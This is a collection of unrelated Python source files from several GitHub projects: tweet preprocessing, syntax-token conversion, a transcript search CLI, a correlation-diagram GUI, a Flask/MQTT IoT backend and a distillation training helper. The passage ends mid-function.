# output = output.replace("{geo}", t.geo)
# output = output.replace("{mentions}", ",".join(str(t.mentions)))
output = output.replace("{translate}", t.translate)
output = output.replace("{trans_src}", t.trans_src)
output = output.replace("{trans_dest}", t.trans_dest)
else:
logme.debug(__name__+':Tweet:notFormat')
output = f"{t.id_str} {t.datestamp} {t.timestamp} {t.timezone} "
# TODO: someone who is familiar with this code, needs to take a look at what this is <also see tweet.py>
# if t.retweet:
# output += "RT "
output += f"<{t.username}> {t.tweet}"
if config.Show_hashtags:
hashtags = ",".join(t.hashtags)
output += f" {hashtags}"
if config.Show_cashtags:
cashtags = ",".join(t.cashtags)
output += f" {cashtags}"
if config.Stats:
output += f" | {t.replies_count} replies {t.retweets_count} retweets {t.likes_count} likes"
if config.Translate:
output += f" {t.translate} {t.trans_src} {t.trans_dest}"
return output
def User(_format, u):
if _format:
logme.debug(__name__+':User:Format')
output = _format.replace("{id}", str(u.id))
# output = output.replace("{name}", u.name)
output = output.replace("{username}", u.username)
# output = output.replace("{bio}", u.bio)
output = output.replace("{location}", u.location)
# output = output.replace("{url}", u.url)
# output = output.replace("{join_date}", u.join_date)
# output = output.replace("{join_time}", u.join_time)
# output = output.replace("{tweets}", str(u.tweets))
# output = output.replace("{following}", str(u.following))
# output = output.replace("{followers}", str(u.followers))
# output = output.replace("{likes}", str(u.likes))
# output = output.replace("{media}", str(u.media_count))
# output = output.replace("{private}", str(u.is_private))
# output = output.replace("{verified}", str(u.is_verified))
# output = output.replace("{avatar}", u.avatar)
# if u.background_image:
# output = output.replace("{background_image}", u.background_image)
# else:
# output = output.replace("{background_image}", "")
else:
logme.debug(__name__+':User:notFormat')
output = f"{u.id} | @{u.username}"
output += f" | Location: {u.location}"
return output
```
#### File: twint/storage/write_meta.py
```python
import re
import string
import nltk
from nltk.corpus import stopwords
import twint
import nest_asyncio
nest_asyncio.apply()
# __import__('IPython').embed()
from nltk.stem.snowball import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import TweetTokenizer, RegexpTokenizer
nltk.download('stopwords')
nltk.download('wordnet')
stemmer = SnowballStemmer("english", ignore_stopwords=True)
# lemmatizer used by lemmatize_tweets() below
lemmatizer = WordNetLemmatizer()
token = RegexpTokenizer(r'[a-zA-Z0-9]+')
# Preprocessing
RE_EMOJI = re.compile('[\U00010000-\U0010ffff]', flags=re.UNICODE)
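# matches astral-plane code points (above U+FFFF), which covers most emoji,
# e.g. strip_emoji("hi 😀") -> "hi " since U+1F600 falls in this range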
def strip_emoji(text):
return RE_EMOJI.sub(r'', text)
def remove_URL(text):
url = re.compile(r"https?://\S+|www\.\S+")
return url.sub(r"", text)
def remove_punct(text):
translator = str.maketrans("", "", string.punctuation)
return text.translate(translator)
def remove_mention(text):
return re.sub("@[A-Za-z0-9]+", "", text)
def stem_tweets(tweet):
tokens = tweet.split()
stemmed_tokens = [stemmer.stem(token) for token in tokens]
return ' '.join(stemmed_tokens)
def lemmatize_tweets(tweet):
tokens = tweet.split()
lemmatized_tokens = [lemmatizer.lemmatize(token) for token in tokens]
return ' '.join(lemmatized_tokens)
# remove stopwords
stop = set(stopwords.words("english"))
def remove_stopwords(text):
filtered_words = [word.lower()
for word in text.split() if word.lower() not in stop]
return " ".join(filtered_words)
def preprocess_tweets(tweet):
tweet = strip_emoji(tweet)
tweet = remove_mention(tweet)
tweet = remove_URL(tweet)
tweet = remove_punct(tweet)
tweet = stem_tweets(tweet)
# tweet = lemmatize_tweets(tweet)
tweet = remove_stopwords(tweet)
return tweet
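# Illustrative walk-through (actual stemmer output may differ slightly):
# "@user check https://t.co/x this is great! 😀"
# -> strip_emoji / remove_mention / remove_URL / remove_punct -> "check this is great"
# -> stem_tweets (stopwords are left unstemmed) -> "check this is great"
# -> remove_stopwords -> "check great"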
def tweetData(t):
t.tweet = t.tweet.lower()
# pre-processing
tweet_processed = preprocess_tweets(t.tweet)
will_be_removed = len(tweet_processed.split(' ')) < 3
c = twint.Config()
c.User_id = t.user_id
c.Store_object = True
c.User_full = True
twint.run.Lookup(c)
user = next((user for user in twint.output.users_list if str(user.id) == str(t.user_id)), None)
user_location = user.location if user is not None else "-"
processed_translation = preprocess_tweets(t.translate)
data = {
# "id": int(t.id),
# "conversation_id": t.conversation_id,
# "created_at": t.datetime,
# "date": t.datestamp,
# "time": t.timestamp,
# "timezone": t.timezone,
# "user_id": t.user_id,
"username": t.username,
# "name": t.name,
# "place": t.place,
"tweet": tweet_processed if not will_be_removed else "",
"OriginalTweet": t.tweet,
"sentiment": 2,
"language": t.lang,
"userid": t.user_id,
"location": user_location,
# "mentions": t.mentions,
# "urls": t.urls,
# "photos": t.photos,
# "replies_count": int(t.replies_count),
# "retweets_count": int(t.retweets_count),
# "likes_count": int(t.likes_count),
# "hashtags": t.hashtags,
# "cashtags": t.cashtags,
# "link": t.link,
# "retweet": t.retweet,
# "quote_url": t.quote_url,
# "video": t.video,
# "thumbnail": t.thumbnail,
# "near": t.near,
# "geo": t.geo,
# "source": t.source,
# "user_rt_id": t.user_rt_id,
# "user_rt": t.user_rt,
# "retweet_id": t.retweet_id,
# "reply_to": t.reply_to,
# "retweet_date": t.retweet_date,
"translate": processed_translation,
"trans_src": t.trans_src,
"trans_dest": t.trans_dest,
}
return data
def tweetFieldnames():
fieldnames = [
# "id",
# "conversation_id",
# "created_at",
# "date",
# "time",
# "timezone",
# "user_id",
"username",
# "name",
# "place",
"tweet",
"OriginalTweet",
"sentiment",
"language",
"userid",
"location",
# "mentions",
# "urls",
# "photos",
# "replies_count",
# "retweets_count",
# "likes_count",
# "hashtags",
# "cashtags",
# "link",
# "retweet",
# "quote_url",
# "video",
# "thumbnail",
# "near",
# "geo",
# "source",
# "user_rt_id",
# "user_rt",
# "retweet_id",
# "reply_to",
# "retweet_date",
"translate",
"trans_src",
"trans_dest"
]
return fieldnames
def userData(u):
data = {
"id": int(u.id),
# "name": u.name,
"username": u.username,
# "bio": u.bio,
"location": u.location,
# "url": u.url,
# "join_date": u.join_date,
# "join_time": u.join_time,
# "tweets": int(u.tweets),
# "following": int(u.following),
# "followers": int(u.followers),
# "likes": int(u.likes),
# "media": int(u.media_count),
# "private": u.is_private,
# "verified": u.is_verified,
# "profile_image_url": u.avatar,
# "background_image": u.background_image
}
return data
def userFieldnames():
fieldnames = [
"id",
# "name",
"username",
# "bio",
"location",
# "url",
# "join_date",
# "join_time",
# "tweets",
# "following",
# "followers",
# "likes",
# "media",
# "private",
# "verified",
# "profile_image_url",
# "background_image"
]
return fieldnames
def usernameData(u):
return {"username": u}
def usernameFieldnames():
return ["username"]
def Data(obj, _type):
if _type == "user":
ret = userData(obj)
elif _type == "username":
ret = usernameData(obj)
else:
ret = tweetData(obj)
return ret
def Fieldnames(_type):
if _type == "user":
ret = userFieldnames()
elif _type == "username":
ret = usernameFieldnames()
else:
ret = tweetFieldnames()
return ret
``` |
{
"source": "3ofcoins/nanodoc",
"score": 2
} |
#### File: lib/nanodoc/pygments2json.py
```python
import json
import re
import sys
TOKEN_CSS_CLASSES = { "Comment": "c",
"Error": "err",
"Keyword": "k",
"Operator": "o",
"Comment.Multiline": "cm",
"Comment.Preproc": "cp",
"Comment.Single": "c1",
"Comment.Special": "cs",
"Generic.Deleted": "gd",
"Generic.Emph": "ge",
"Generic.Error": "gr",
"Generic.Heading": "gh",
"Generic.Inserted": "gi",
"Generic.Output": "go",
"Generic.Prompt": "gp",
"Generic.Strong": "gs",
"Generic.Subheading": "gu",
"Generic.Traceback": "gt",
"Keyword.Constant": "kc",
"Keyword.Declaration": "kd",
"Keyword.Namespace": "kn",
"Keyword.Pseudo": "kp",
"Keyword.Reserved": "kr",
"Keyword.Type": "kt",
"Literal.Number": "m",
"Literal.String": "s",
"Name.Attribute": "na",
"Name.Builtin": "nb",
"Name.Class": "nc",
"Name.Constant": "no",
"Name.Decorator": "nd",
"Name.Entity": "ni",
"Name.Exception": "ne",
"Name.Function": "nf",
"Name.Label": "nl",
"Name.Namespace": "nn",
"Name.Tag": "nt",
"Name.Variable": "nv",
"Operator.Word": "ow",
"Text.Whitespace": "w",
"Literal.Number.Float": "mf",
"Literal.Number.Hex": "mh",
"Literal.Number.Integer": "mi",
"Literal.Number.Oct": "mo",
"Literal.String.Backtick": "sb",
"Literal.String.Char": "sc",
"Literal.String.Doc": "sd",
"Literal.String.Double": "s2",
"Literal.String.Escape": "se",
"Literal.String.Heredoc": "sh",
"Literal.String.Interpol": "si",
"Literal.String.Other": "sx",
"Literal.String.Regex": "sr",
"Literal.String.Single": "s1",
"Literal.String.Symbol": "ss",
"Name.Builtin.Pseudo": "bp",
"Name.Variable.Class": "vc",
"Name.Variable.Global": "vg",
"Name.Variable.Instance": "vi",
"Literal.Number.Integer.Long": "il", }
def lines2tokens(lines):
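# stdin is expected to carry pygments' token dump, one "<token type>\t<repr'd text>" line each,
# e.g. the input line: Token.Keyword\t'def' yields the token ["def", "Keyword", "k"]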
for line in lines:
token_type, text = line.split("\t", 1)
text = eval(text, {"__builtins__": None}, {})
if token_type.startswith('Token.'):
token_type = token_type[6:]
_head = True
for piece in text.split("\n"):
if not _head:
yield ["\n", 'Text.Newline']
if piece != "":
if piece.isspace():
yield [piece, 'Text.Whitespace']
else:
yield [piece, token_type, TOKEN_CSS_CLASSES.get(token_type, None)]
_head = False
json.dump(tuple(lines2tokens(sys.stdin)), sys.stdout)
``` |
{
"source": "3ok/carpet",
"score": 3
} |
#### File: carpet/carpet/main.py
```python
import argparse
import os
from typing import Optional, Sequence
from carpet.constants import AWC_BONGO, CARPET_CACHE_FILE
from carpet.core import fetch_videos, find_video_from_text, load_videos_from_json
def fetch(force: bool) -> None:
if force or not os.path.exists(CARPET_CACHE_FILE):
print("Fetching explains videos, might take a couple of minutes ...")
fetch_videos(save=True)
print(f"Fetching results saved successfully at {CARPET_CACHE_FILE}")
else:
print(f"Fetching results already done (see {CARPET_CACHE_FILE})")
def find(text: str) -> None:
if not os.path.exists(CARPET_CACHE_FILE):
print(f"{CARPET_CACHE_FILE} does not exist, please run `carpet fetch` first")
else:
videos = load_videos_from_json()
video_info = find_video_from_text(text, videos)
if video_info is None:
print("No videos were found!")
else:
video, start = video_info
url = video.url_starts_at(start)
print(f"There you go ! ({video.title}) : {url}")
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest="command", required=True)
bongo_parser = subparsers.add_parser("bongo", help="awcBongo")
fetch_parser = subparsers.add_parser(
"fetch",
help=(
"Fetch transcripts from explains videos, may take a while. "
"This generates a .carpet.json file."
),
)
fetch_parser.add_argument(
"--force",
action="store_true",
help="Force the creation of .carpet.json even if it exists",
)
find_parser = subparsers.add_parser(
"find",
help=(
"Find a video (and corresponding timestamp) corresponding "
"to a specific input text. This suppose that .carpet.json exists."
),
)
find_parser.add_argument("text", help="text to look for")
args = parser.parse_args(argv)
if args.command == "bongo":
print(AWC_BONGO)
elif args.command == "fetch":
fetch(args.force)
elif args.command == "find":
find(args.text)
return 0
if __name__ == "__main__":
raise SystemExit(main())
``` |
{
"source": "3olich/correlation-highlighting",
"score": 3
} |
#### File: 3olich/correlation-highlighting/main.py
```python
import os.path
from sys import argv, exc_info
import design
import matplotlib.pyplot as plt
from numpy import corrcoef, seterr
from PyQt5 import QtWidgets
import xlsxwriter
def tranc(matrix):
"""
Transposes a matrix.
matrix - a matrix as a list of lists;
return - the transposed matrix in the same format.
"""
return list(map(list, zip(*matrix)))
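# e.g. tranc([[1, 2], [3, 4]]) -> [[1, 3], [2, 4]]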
def read_csv(filename, start, end):
'''
In the usual standard-library sense, csv separates cells
with commas, but the input file we get
uses ';' as the delimiter.
'''
csv_file = open(filename, encoding='cp1251')
# Skip all rows up to the starting cycle
for i in range(start + 1):
next(csv_file)
matr = []
# iterate over every row
for num, row in enumerate(csv_file):
# Values in the csv are stored in the format ' %d%d '
def to_int(x): return int(x.strip())
# The first three columns hold no values
vals = map(to_int, row.split(';')[3:])
matr.append(vals)
# Cap how many rows we read
if num == end - start:
break
matr = tranc(matr)
csv_file.close()
return matr
def serializeToExcel(infile, outfile, st, end):
workbook = xlsxwriter.Workbook(outfile)
worksheet = workbook.add_worksheet()
with open(infile, 'r', encoding='cp1251') as inputed:
header_row = inputed.read().split('\n')[1]
headers = header_row.split(';')[3:]
# This just needs to be here
worksheet.write('J2', 'Pearson correlation matrix')
worksheet.write('W1', 'Table')
worksheet.set_column(0, len(headers) + 1, 4)
for index, header in enumerate(headers):
# 3 to leave room for the header
hcell = f'{chr(ord("B") + index)}3'
vcell = f'A{index + 4}'
worksheet.write(hcell, header)
worksheet.write(vcell, header)
matrix = corrcoef(read_csv(infile, st, end))
# Replace NaNs with 0 (NaN != NaN, hence the x == x check)
matrix = [[x if x == x else 0 for x in row] for row in matrix]
positive_str = workbook.add_format({'bold': True, 'font_color': 'red'})
positive_weak = workbook.add_format({'bold': False, 'font_color': 'red'})
negative_str = workbook.add_format({'bold': True, 'font_color': 'blue'})
negative_weak = workbook.add_format({'bold': False, 'font_color': 'blue'})
for num, row in enumerate(matrix):
for let, cell in enumerate(row):
if cell > 0.7:
format_ = positive_str
elif cell > 0:
format_ = positive_weak
elif cell < -0.7:
format_ = negative_str
elif cell < 0:
format_ = negative_weak
else:
format_ = workbook.add_format()
# 4 so there is room for the header row
worksheet.write(f'{chr(ord("B") + let)}{num + 4}', cell, format_)
workbook.close()
class inner_scheme:
'''
An instance of this class turns hardware-recorded values into a diagram,
taking the mutual correlation of the values into account.
'''
# Key - name of the center on the diagram
# Value[0] - name in Russian
# Value[1] - position in the source CSV
# Value[2] - X coordinate
# Value[3] - Y coordinate
positions = {"RP": ["Подж/сел", 0, 3, 0], "F": ["Печень", 1, -3, 0], "E": ["Желудок", 3, 4, 0],
"R": ["Почки", 8, -2, -2], "V": ["Моч.поз", 9, -3, -3], "IG": ["Тонкая кишка", 19, -2, 3],
"TR": ["Лимф. система", 14, 2, 3], "C": ["Сердце", 18, -1, 2],
"MC": ["Эндокринная система", 13, 1, 2],
"VB": ["Желчный пузырь", 7, -4, 0], "P": ["Легкие", 11, 2, -2],
"GI": ["Толстая кишка", 12, 3, -3]}
# Specifies which lines should be drawn
lines = (("VB", "V"), ("VB", "IG"), ("VB", "C"),
("VB", "R"), ("VB", "F"), ("F", "V"),
("F", "R",), ("F", "IG"), ("F", "C"),
("F", "MC"), ("F", "P"), ("V", "R"),
("V", "GI"), ("V", "P"), ("R", "C"),
("R", "MC"), ("R", "P"), ("R", "GI"),
("R", "RP"), ("GI", "E"), ("GI", "RP"),
("GI", "P"), ("P", "C"), ("P", "MC"),
("P", "RP"), ("P", "E"), ("E", "MC"),
("E", "RP"), ("E", "TR"), ("RP", "C"),
("RP", "MC"), ("RP", "F"), ("RP", "TR"),
("MC", "C"), ("MC", "TR"), ("MC", "IG"),
("TR", "IG"), ("TR", "C"), ("IG", "C"))
def __init__(self, source, start, end, strong_corr_coeff, weak_corr_coeff):
"""Class constructor
Keyword arguments:
source -- the source file in csv format
start -- the cycle number processing starts at
end -- the cycle number processing ends at
strong_corr_coeff -- the absolute correlation value
from which an interaction counts as strong
weak_corr_coeff -- the absolute correlation value
below which an interaction counts as weak
"""
if end <= start:
raise ValueError(f'Invalid cycle number: start={start}, end={end}')
if strong_corr_coeff < weak_corr_coeff:
raise ValueError(f'Invalid coeffs: strong={strong_corr_coeff}, weak={weak_corr_coeff}')
if not os.path.exists(source):
raise FileExistsError('File not found')
self.source = source
self.start_cycle = start
self.end_cycle = end
self.strong_corr_coeff = strong_corr_coeff
self.weak_corr_coeff = weak_corr_coeff
# Needed for the file names
big_percent = str(int(100 * self.strong_corr_coeff))
small_percent = str(int(100 * self.weak_corr_coeff))
# All output files go into a separate directory
self.result_dir = os.path.join(os.path.dirname(
os.path.abspath(source)), f'{source[:-4]}[{start}-{end}]({big_percent}-{small_percent})')
if not os.path.exists(self.result_dir):
os.makedirs(self.result_dir)
self.process()
def process(self):
self.corr = corrcoef(
read_csv(self.source, self.start_cycle, self.end_cycle))
self.draw_init()
self.draw_nodes()
self.draw_inner_edges()
self.draw_outer_edges()
self.draw_ending()
serializeToExcel(self.source, os.path.join(
self.result_dir, 'corr_matrix.xlsx'), self.start_cycle, self.end_cycle)
plt.show()
def draw_init(self):
# Create the figure object that holds the diagram
self.fig = plt.figure()
self.ax = self.fig.gca()
plt.title('Correlation study')
# Hide the frame and the coordinate grid
self.fig.patch.set_visible(False)
self.ax.axis('off')
def draw_nodes(self):
# Generate the node coordinates
# In Python 3+ map returns an iterator, while plotly needs a list
x = [node[2] for node in inner_scheme.positions.values()]
y = [node[3] for node in inner_scheme.positions.values()]
# Draw the nodes on the figure
plt.scatter(x, y, color='gray', s=25**2, alpha=1, zorder=2, )
for center in inner_scheme.positions.keys():
# The text is drawn with a small offset; the result simply looks nicer this way
def pred(x): return x-0.12
plt.text(
*map(pred, inner_scheme.positions[center][2:4]), s=center,)
def draw_inner_edges(self):
for line in inner_scheme.lines:
self.draw_edge(*line)
def draw_outer_edges(self):
pass
def draw_ending(self):
# outfile = f'{self.source[:-4]}[{self.start_cycle}-{self.end_cycle}]'
plt.savefig(os.path.join(self.result_dir, 'scheme.jpeg'))
def draw_edge(self, lhs, rhs):
x = [inner_scheme.positions[lhs][2], inner_scheme.positions[rhs][2]]
y = [inner_scheme.positions[lhs][3], inner_scheme.positions[rhs][3]]
color_positive = "red"
color_negative = "blue"
# https://matplotlib.org/examples/color/named_colors.html
color_light_negative = "skyblue"
color_light_positive = "darksalmon"
color_zero = "Black"
width_fat = 4
width_thin = 2
coeff = self.corr[inner_scheme.positions[lhs]
[1]][inner_scheme.positions[rhs][1]]
if -1 <= coeff <= - self.strong_corr_coeff:
color_ = color_negative
width_ = width_fat
elif -self.strong_corr_coeff < coeff <= -self.weak_corr_coeff:
color_ = color_negative
width_ = width_thin
elif -self.weak_corr_coeff < coeff < 0:
color_ = color_light_negative
width_ = width_thin
elif 0 < coeff < self.weak_corr_coeff:
color_ = color_light_positive
width_ = width_thin
elif self.weak_corr_coeff <= coeff < self.strong_corr_coeff:
color_ = color_positive
width_ = width_thin
elif self.strong_corr_coeff <= coeff <= 1:
color_ = color_positive
width_ = width_fat
else:
color_ = color_zero
width_ = width_thin
plt.plot(x, y, color=color_, linewidth=width_, zorder=1)
class GUI(QtWidgets.QMainWindow, design.Ui_MainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.fileSelector.clicked.connect(self.browse_folder)
self.goButton.clicked.connect(self.work)
def browse_folder(self):
self.fileLabel.clear()
self.filename = QtWidgets.QFileDialog.getOpenFileName(
self, "Select a folder")
if self.filename:
self.fileLabel.setText(self.filename[0])
else:
self.warningLabel.setText("No file selected!!!")
def work(self):
try:
scheme = inner_scheme(self.filename[0], self.cyclesFrom.value(
), self.cyclesTo.value(), self.strong.value(), self.wick.value())
print(self.filename[0], self.cyclesFrom.value(
), self.cyclesTo.value(), self.strong.value(), self.wick.value())
self.warningLabel.setText(
f"All good\nResult saved to {scheme.result_dir}")
except Exception:
self.warningLabel.setText(f"Error: {exc_info()[1]}")
if '__main__' == __name__:
"""
The formula for the Pearson correlation coefficient divides (word of the day: normalization)
the covariance of X and Y by the product of their standard deviations.
Since Y can have zero variance,
its standard deviation can be zero as well.
That is why the true_divide error - division by zero - shows up sometimes.
Almost every file has a couple of columns that look like [100, 100, 100, 100, ..],
and with a small number of cycles this blows up.
"""
seterr(divide='ignore', invalid='ignore')
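# For reference, the formula in question:
# r_xy = cov(X, Y) / (std(X) * std(Y))
# and a minimal illustration of the zero-variance case:
# >>> corrcoef([[1, 2, 3], [100, 100, 100]])
# array([[ 1., nan],
# [nan, nan]])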
app = QtWidgets.QApplication(argv)
window = GUI()
window.show()
app.exec_()
``` |
{
"source": "3omer/zelite",
"score": 2
} |
#### File: app/API/authAPI.py
```python
import re
from flask import request, jsonify
from flask_jwt_extended import jwt_required, create_access_token, get_raw_jwt
from app import app, jwt_manager
from app.models import RevokedToken, User, NotUniqueError, ValidationError
from app.JSONSchemas import UserSchema, ValidationError
from app.mailService import send_verification_mail
# initialize jwt loader
@jwt_manager.token_in_blacklist_loader
def token_black_listed_loader(dec_token):
jti = dec_token["jti"]
return RevokedToken.is_blacklisted(jti)
@app.route("/api/v1/register", methods=["POST"])
def register():
user_schema = UserSchema()
if request.method == "POST":
json_data = request.get_json()
try:
user_schema.load(json_data)
new_user = User.register(json_data)
send_verification_mail(
new_user.email, new_user.get_verification_token())
return jsonify({
"status": "success",
"message": "Check your email to activate your account",
"user": user_schema.dump(new_user)
}), 201
except ValidationError as e:
return jsonify({
"status": "failed",
"messages": e.messages
}), 400
except NotUniqueError as e:
# TODO: this is a tricky way to identify the path that raised the duplicate error
# by searching in the error message
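# (a typical duplicate-key message looks like: "E11000 duplicate key error ... index: username_1 dup key: ...")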
mongo_error_message = str(e)
field = "username" \
if re.search("username", mongo_error_message) \
else "email"
# for consistency, structure the error like the marshmallow validation errors
e = {
"status": "validation failed",
"messages": {
field: [
"this {} is already registered".format(field)]
}
}
return jsonify(e), 400
@app.route("/api/v1/verify", methods=["GET"])
def verify_email():
token = request.args.get("token")
try:
User.verify_account(token)
return jsonify({
"status": "success",
"message": "Account has been activated"
})
except Exception as e:
print(e)
return jsonify({
"status": "account activation failed",
"message": "Invalid or expired link"
}), 403
@app.route("/api/v1/login", methods=["POST"])
def jwt_login():
email = request.json.get("email", None)
password = request.json.get("password", None)
error_messages = {}
if not email:
error_messages["email"] = ["required field"]
if not password:
error_messages["password"] = ["required field"]
if error_messages:
return jsonify({
"status": "validation failed",
"messages": error_messages
}), 400
user = User.get_by_email(email)
if not (user and user.check_password(password)):
res = {
"status": "login failed",
"message": "email or password is wrong"
}
return jsonify(res), 401
if not user.verified:
return jsonify({
"status": "login failed",
"message": "Confirm your account. Follow instruction sent to your email"
}), 400
token = user.generate_token()
res = {
"status": "success",
"token": token,
"user": UserSchema().dump(user)
}
return jsonify(res)
@app.route("/api/v1/logout", methods=["POST"])
@jwt_required
def revoke_token():
jti = get_raw_jwt()["jti"]
RevokedToken.add(jti)
return jsonify({
"status": "success",
"message": "successuflly logged out"
}), 200
```
#### File: app/API/utils.py
```python
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
import paho.mqtt.subscribe as subscribe
from flask import current_app as app
MQTT_USERNAME = "admin"
MQTT_PWD = "<PASSWORD>"
MQTT_ID = "SERVERADMIN"
def set_switch_state(device, state):
"""Publish the desired switch state to the MQTT broker
:@state: '0' or '1'
:@return: True if the operation succeeded
"""
mqtt_settings = app.config["MQTT_SETTINGS"]
hostname = mqtt_settings["host"]
port = mqtt_settings["port"]
try:
publish.single(device.topic, payload=state, qos=1, retain=True,\
hostname=hostname, port=port, client_id=MQTT_ID, \
keepalive=5, will=None, auth={'username': MQTT_USERNAME,\
'password': MQTT_PWD}, tls=None, protocol=mqtt.MQTTv311, transport="tcp")
return True
except Exception as error:
print("MQTT failed", error)
return False
def read_sensor(device):
mqtt_settings = app.config["MQTT_SETTINGS"]
hostname = mqtt_settings["host"]
port = mqtt_settings["port"]
try:
# publish.single() always returns None; to actually read a value we
# subscribe and wait for a single (retained) message on the device topic
msg = subscribe.simple(device.topic, qos=1, msg_count=1,\
hostname=hostname, port=port, client_id=MQTT_ID, \
keepalive=5, will=None, auth={'username': MQTT_USERNAME,\
'password': MQTT_PWD}, tls=None, protocol=mqtt.MQTTv311, transport="tcp")
return msg.payload
except Exception as error:
print("MQTT failed", error)
return None
def validate_user_mqtt(user, username, password):
if user.mqtt_username == username and user.mqtt_password == password:
return True
return False
def is_mqtt_admin(username, password):
if username == MQTT_USERNAME and password == MQTT_PWD:
return True
return False
```
#### File: src/app/models.py
```python
import secrets
import jwt
from time import time
from app import app
from app import db
from app.commons import APP_NAME
from app.API.utils import set_switch_state
from mongoengine.errors import NotUniqueError, ValidationError
from flask_jwt_extended import create_access_token
from werkzeug.security import generate_password_hash, check_password_hash
class RevokedToken(db.Document):
jti = db.StringField(unique=True)
@classmethod
def is_blacklisted(cls, jti):
return cls.objects(jti=jti).first() != None
@classmethod
def add(cls, jti):
return cls(jti=jti).save()
class User(db.Document):
email = db.EmailField(max_length=50, unique=True)
username = db.StringField(max_length=50, unique=True)
password_hash = db.StringField(max_length=128)
verified = db.BooleanField(default=False)
mqtt_username = db.StringField(max_length=128)
mqtt_password = db.StringField(max_length=128)
topics = db.ListField(db.StringField())
meta = {'auto_create_index':False}
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def validate_mqtt(self, mqtt_username, mqtt_password):
if self.mqtt_username == mqtt_username and \
self.mqtt_password == mqtt_password:
return True
def has_topic(self, topic):
return topic in self.topics
def generate_token(self):
token = create_access_token(identity={
"username": self.username,
"id": str(self.id)
})
return token
def get_verification_token(self, expires_in=12*60*60):  # 12 hours, in seconds
return jwt.encode({
"email": self.email,
"exp": time() + expires_in
},
app.config['SECRET_KEY'],
algorithm='HS256'
)
@classmethod
def verify_account(cls, token):
email = None
try:
email = jwt.decode(token, app.config["SECRET_KEY"], algorithms=['HS256'])["email"]
user = cls.get_by_email(email)
if not user:
raise jwt.InvalidTokenError()
user.verified = True
user.save()
return True
except jwt.ExpiredSignatureError as er:
# print(er)
return
@classmethod
def register(cls, form):
username = form.get("username")
email = form.get("email")
password = form.get("password")
new_user = cls(username=username, email=email)
new_user.set_password(password)
new_user.save()
return new_user
@classmethod
def get_by_email(cls, email):
return cls.objects(email=email).first()
@classmethod
def get_by_username(cls, username):
return cls.objects(username=username).first()
@classmethod
def get_by_id(cls, id):
return cls.objects(id=id).first()
@classmethod
def get_by_mqtt_username(cls, mqtt_username):
return cls.objects(mqtt_username=mqtt_username).first()
def __repr__(self):
return "<User {}>".format(self.username)
class Device(db.Document):
TYPES = {'switch': 1,
'sensor': 2}
key = db.StringField(
unique=True, default=lambda: secrets.token_urlsafe(10))
owner = db.ReferenceField(
User, required=True, reverse_delete_rule="cascade")
port = db.IntField(required=True)
name = db.StringField(max_length=50, required=True)
place = db.StringField(max_length=50, required=True)
d_type = db.StringField(choices=("switch", "sensor"), required=True)
topic = db.StringField(unique=True)
def save(self, force_insert=False, validate=True, clean=True, write_concern=None, cascade=None, cascade_kwargs=None,
_refs=None, save_condition=None, signal_kwargs=None, **kwargs):
# TODO: eliminate the mqtt dependency by using a queue or something
self.topic = self._generate_topic()
# tell the broker to set the switch to 0
flag = True
if self.d_type == "switch":
flag = set_switch_state(self, "0")
if not flag:
raise Exception("MQTT Failure")
# update user topics
self.owner.topics.append(self.topic)
self.owner.save()
return super().save(force_insert, validate, clean, write_concern, cascade, cascade_kwargs, _refs,
save_condition, signal_kwargs, **kwargs)
def delete(self, signal_kwargs=None, **write_concern):
self.owner.topics.remove(self.topic)
self.owner.save()
return super().delete(signal_kwargs, **write_concern)
def _generate_topic(self):
_TOPIC_TEMP = APP_NAME + "/{username}/{key}/{d_type}/{port}"
return _TOPIC_TEMP.format(username=self.owner.username, key=self.key, d_type=self.d_type, port=self.port)
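# e.g. (illustrative; APP_NAME comes from app.commons) for user "alice", key "AbC123",
# a switch on port 5 this yields "<APP_NAME>/alice/AbC123/switch/5"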
def serialize(self):
return {
"key": self.key,
"user_id": str(self.owner.id),
"name": self.name,
"place": self.place,
"type": self.d_type,
"port": self.port,
"topic": self.topic
}
@classmethod
def by_owner(cls, owner):
return cls.objects(owner=owner).all()
@classmethod
def by_key(cls, key):
return cls.objects(key=key).first()
def __repr__(self):
return "<Device> {}".format(self.name)
``` |
{
"source": "3outeille/knowledgeDistillation",
"score": 2
} |
#### File: knowledgeDistillation/distillation/baseDistiller.py
```python
import torch
import torch.nn as nn
from distillation.utils import Logger, AverageMeter, Accuracy
from datetime import datetime
import os
class BaseDistiller(nn.Module):
def __init__(self):
super(BaseDistiller, self).__init__()
self.currentTime = datetime.now().strftime("%Y%m%d-%H%M%S")
def _setHook(self, hook, model, layer):
"""
Set hook for distillation on provided model and layer.
"""
hook.setHook(self._getLayer(model, layer))
def _getLayer(self, model, layer):
"""
Fetch layer from model.
:param layer: int or str; layer position or layer name for backbone model, to use as distillation layer
"""
if type(layer) == str:
modules = dict([*model.named_modules()])
return modules.get(layer, None)
elif type(layer) == int:
children = [*model.children()]
return children[layer]
else:
raise NameError(f'Hidden layer ({layer}) not found in model!')
def print_epoch(self, epoch, epochs, metrics):
"""
Print training metrics for epoch.
"""
template = f'Epoch: {epoch:3}/{epochs}'
for name, metric in metrics.items():
template += f'\t {name}: {metric:3.3f}'
print(template)
def load_state(self, checkpoint, student=None, teacher=None, optimizer=None):
"""
Load checkpoint if provided and return epoch to start on.
"""
startEpoch = 1
if checkpoint:
if os.path.isfile(checkpoint):
device = next(student.parameters()).device
state = torch.load(checkpoint, map_location=device)
startEpoch = state['epoch']
if student is not None:
student.load_state_dict(state['student'])
if teacher is not None:
teacher.load_state_dict(state['teacher'])
if optimizer is not None:
optimizer.load_state_dict(state['optimizer'])
return startEpoch
def init_tensorboard_logger(self, subDirectory=None):
self.logDir = os.path.join('logs', '' if subDirectory is None else subDirectory, self.currentTime)
self.logger = Logger(self.logDir)
def log(self, epoch, metrics):
"""
Log performance metrics to tensorboard.
:param epoch: int, current training epoch
:param metrics: dict, name and metric
"""
for name, metric in metrics.items():
self.logger.add_scalar(name, metric, epoch)
self.logger.flush()
def save(self, epoch, student, teacher, optimizer, subDirectory=None):
"""
Save checkpoint of model.
"""
self.checkpointDir = os.path.join('checkpoint', '' if subDirectory is None else subDirectory, self.currentTime)
os.makedirs(self.checkpointDir, exist_ok=True)
torch.save({'epoch': epoch,
'student': student.state_dict(),
'teacher': teacher.state_dict(),
'optimizer': optimizer.state_dict()},
